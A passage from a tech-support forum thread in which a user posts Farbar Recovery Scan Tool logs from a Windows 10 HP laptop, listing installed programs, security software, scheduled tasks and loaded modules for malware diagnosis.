    2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
    2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
    2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
    2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
    2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel
    2017-01-02 18:29 - 2016-10-02 22:40 - 00046599 _____ C:\Users\Joseph\Desktop\Expense Tracking.xlsx

    ==================== Files in the root of some directories =======

    2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
    2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
    2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
    2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

    LastRegBack: 2017-01-23 10:44

    ==================== End of FRST.txt ===========================


    #7
    mw201

    • Topic Starter
    • Member
    • 15 posts

    addition:

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (01-02-2017 21:32:05)
    Running from C:\Users\Joseph\Downloads
    Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
    Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
    Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Bitdefender Antivirus (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
    AS: Bitdefender Antispyware (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
    Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
    Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
    Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
    Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
    Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
    Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
    CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
    Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
    Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
    Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
    Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
    Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
    Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
    HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
    HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
    HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
    HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
    HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
    HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
    HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
    HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
    HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
    HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
    IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
    Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
    Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
    Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
    Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
    Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
    Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
    Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
    Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
    Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
    Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
    Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1 - Mozilla)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
    Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
    PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
    Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
    Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
    Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
    The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
    TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
    Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
    UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version:  - UserTesting.com)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
    WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
    Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
    Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
    Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
    Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
    Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
    Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
    Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
    Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&amp;page=tsInstall
    Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
    Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
    Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
    Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
    Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
    Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
    Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
    Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
    Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
    Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square

    ==================== Loaded Modules (Whitelisted) ==============

    2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
    2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
    2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
    2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
